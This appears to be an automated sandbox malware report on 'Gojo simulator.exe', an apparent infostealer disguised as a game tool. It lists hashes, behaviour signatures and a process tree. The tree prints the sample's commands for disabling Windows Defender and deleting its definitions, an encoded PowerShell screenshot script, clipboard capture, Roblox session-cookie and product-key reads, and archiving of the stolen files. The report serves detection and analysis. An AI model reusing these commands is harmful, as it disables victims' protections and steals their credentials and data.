Analysis

  • max time kernel
    11s
  • max time network
    17s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250410-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    14/04/2025, 23:25

General

  • Target

    dist/Gojo simulator.exe

  • Size

    7.8MB

  • MD5

    af5dd5e0736e272360fd2808eb1e570b

  • SHA1

    a67924548f53e09ce4d1e4906a0a12e3cd4b1839

  • SHA256

    bf89680b50b1fa2be445ffc674826d3445c98761a4c65a081e4eb5938eab1736

  • SHA512

    02a6f7ad4cf9cb196b9246d2fb9c94a46b9163a71fff31f8b5dee12bd58cd6aa7175ec37d71a1ce8fa320af222af86e4f236ed44b3c29989d58c4a5ffa8aed57

  • SSDEEP

    196608:mW1CHUOXXKApOgj9fZwQRCgiIKpdzjPOan7j2y283TOnOh:YxMUw8wIKppDO9ih

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 42 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe
    "C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5908
    • C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe
      "C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dist\Gojo simulator.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1120
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5252
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3776
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          4⤵
          • Deletes Windows Defender Definitions
          PID:5696
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOADED', 0, 'Load in game', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2640
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('LOADED', 0, 'Load in game', 48+16);close()"
          4⤵
            PID:1564
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4732
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1756
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4728
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:5064
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4224
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4024
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:3860
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            PID:3648
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5076
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            PID:3468
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5080
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:1740
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4600
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:2544
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4280
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4396
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\umancf02\umancf02.cmdline"
                5⤵
                  PID:3424
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7261.tmp" "c:\Users\Admin\AppData\Local\Temp\umancf02\CSCE84C43A7BB0943B9B043D9572025E8E5.TMP"
                    6⤵
                      PID:2660
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1016
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1128
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2824
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:4812
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4016
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3600
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1580
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:5756
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:1152
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1460
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:2352
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2476
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:2604
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3232
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:1868
                                  • C:\Windows\system32\getmac.exe
                                    getmac
                                    4⤵
                                      PID:5088
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI59082\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\ZHuy3.zip" *"
                                    3⤵
                                      PID:1764
                                      • C:\Users\Admin\AppData\Local\Temp\_MEI59082\rar.exe
                                        C:\Users\Admin\AppData\Local\Temp\_MEI59082\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\ZHuy3.zip" *
                                        4⤵
                                        • Executes dropped EXE
                                        PID:3136
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                      3⤵
                                        PID:5416
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic os get Caption
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:6044
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                        3⤵
                                          PID:6128
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic computersystem get totalphysicalmemory
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5548
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          3⤵
                                            PID:1952
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5024
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                            3⤵
                                              PID:2788
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1044
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                              3⤵
                                                PID:2584
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic path win32_VideoController get name
                                                  4⤵
                                                  • Detects videocard installed
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2124
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                3⤵
                                                  PID:3024
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                    4⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4296

                                            Network

                                            MITRE ATT&CK Enterprise v16

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                              Filesize

                                              3KB

                                              MD5

                                              e8a95a33bdaa8522f9465fd024c3ec88

                                              SHA1

                                              45c15dbb8ab99be8e813aee1ed3e21ad334c8745

                                              SHA256

                                              06abbf9cccdf6557b1f616e0c9214c580f1d2be928104a0c8193c2217dd98c1b

                                              SHA512

                                              c429d8d5bfba8790a725e9d6eed656b93e69bfa8290ca388cf007aeb82462db39539ce5da4ab00c19e795344119ab14cef915c39503da80a69953e0e2ee2a002

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              1KB

                                              MD5

                                              f2bf91b75cb14938ad364d87939d691e

                                              SHA1

                                              a60421454bb09078906ecfa6161c2382968b5997

                                              SHA256

                                              3c57623528091602328622648079d42cf86f99ab730bfe07eb6eafbe7af12a9e

                                              SHA512

                                              a6b06e715b4aaa9f1c056b8f58a7c0e8da2f80837c54c0533005d85a65a73932213e233bc89b6cc49edf890993f3ebb7a74025ccf09b1eb9a5a614c7a41f3aba

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              1KB

                                              MD5

                                              4b8c1a99bf01a5bd29dffaeaa048f71e

                                              SHA1

                                              c76e064c2a88e1c7a8ef7e485a3f183611a8fefd

                                              SHA256

                                              f070e6a81fa8544e1f57f0bffe4873902cc5678d191843bd2527798887b67774

                                              SHA512

                                              a2db1ff58071ea460bcfb1309a1e900465cc3fb9e1aa261aa06743f35b1afbb7701495cadc769fb4e95691efac63bc30c786f242dfa4a854f9d3cbeea2476fbb

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              1KB

                                              MD5

                                              74b3258cbd29eb0802eb175c80c7e1b3

                                              SHA1

                                              277d313bfe9def451dd62a4846d9fcc60c6066be

                                              SHA256

                                              9135e73d7f10413ff81400bc642fc4f25cf7f22b421f993a2cba7307d5f82e9a

                                              SHA512

                                              06a6efb7de89a6b3d224ba30cf1afe1fc7ab08d2b22caf7527bbc5c0e26f8979d5494f6266a7174de59e21a1a901f9b8454f14684dcc5ccd05930a0ff5a3c20e

